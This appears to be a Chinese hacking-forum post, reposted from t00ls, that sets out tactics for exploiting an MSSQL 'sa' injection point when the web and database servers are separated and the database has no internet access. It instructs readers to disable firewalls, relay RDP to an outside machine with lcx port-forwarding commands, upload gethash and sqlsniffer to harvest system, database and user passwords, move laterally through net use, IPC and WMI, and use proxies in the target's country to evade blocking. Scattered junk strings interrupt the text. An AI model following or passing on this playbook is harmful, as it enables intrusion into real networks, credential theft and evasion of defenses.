中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]

作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。5 [; e% V+ E3 I- D0 G" t

, w  j# F# F" u/ q
% T- g6 i2 k" g* |5 b: V" P+ N( @9 L8 |, m0 J% R
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
9 l3 G* P! r9 `; a- F# n7 w5 k2 @4 n) a4 B) i
2 ]9 [+ \' o: {( |+ l4 e# _
一、DB机有公网IP.
0 V. \* W1 r/ Z( F% J5 O- n
0 O" U; s- {1 x0 K0 [' t1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.3 }4 m. |" ~; M5 E* ~1 V8 ^

* e8 s% x2 Y3 S7 e6 r; Z# a5 W6 ]# w
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
& R* v; x2 J: f4 F2 D$ [
- t1 K4 `( A8 r( G8 o8 |9 R0 @0 z2 e3 [2 u: k
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
' R8 S- Z% y! K2 C0 W3 O( A0 ~$ e7 [' u8 b

6 o; I. J! m8 o$ g& x1 v4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.6 A: ^/ R$ `# [4 m- n5 G9 S

7 i" }) K. Q6 r' m& `" g' c7 R( B" t9 ^3 Q1 N
' h, M/ `( H1 i6 _
二、DB机只有内网IP
# \6 N& w* M* S" L- I7 g, e) Y
+ G. C8 @, o+ e" V& E1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
; Y5 ]- P  q9 V1 }& K
/ Z- ]- w2 [9 X8 a  _7 a
2 T4 B$ r& b9 [: K5 `  _! b2:停掉防火墙和IP策略再从内往外扫描.  o* I- o: [0 W/ W" c  j
2 i! e& F% D, e* C

" q; @: ^2 x+ d3 Z: _3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
+ w% v* u, P- B- x9 |
. V# E# M& ~0 b( D8 o/ X- P
# Y- V) _. ?8 K) m7 H' G4:学会密码规律分析往往会有惊喜.
' g, ^+ d6 Z" f
/ p& h. N- O' Q0 t6 x" q! _8 j) H, Q7 F& T4 K+ o$ z
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
2 P, q( q- A- O3 f( S7 [+ y" A' k- s  f8 [6 I

& `$ N$ G; m3 v  d有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2